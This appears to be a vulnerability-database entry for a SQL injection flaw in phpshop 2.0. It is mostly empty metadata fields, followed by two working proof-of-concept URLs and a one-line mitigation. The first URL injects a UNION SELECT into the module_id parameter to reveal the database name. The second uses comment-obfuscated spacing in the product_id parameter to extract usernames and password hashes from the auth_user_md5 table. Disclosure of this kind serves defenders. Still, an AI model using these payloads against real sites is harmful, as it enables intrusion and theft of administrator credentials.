vendor:
phpshop 2.0
by:
onestree
6,5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: phpshop 2.0
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 / Ubuntu
N/A
phpshop 2.0 SQL Injection Vulnerability
SQLi p0c: http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
Mitigation:
Input validation, parameterized queries, and proper authentication and authorization should be used to prevent SQL injection attacks.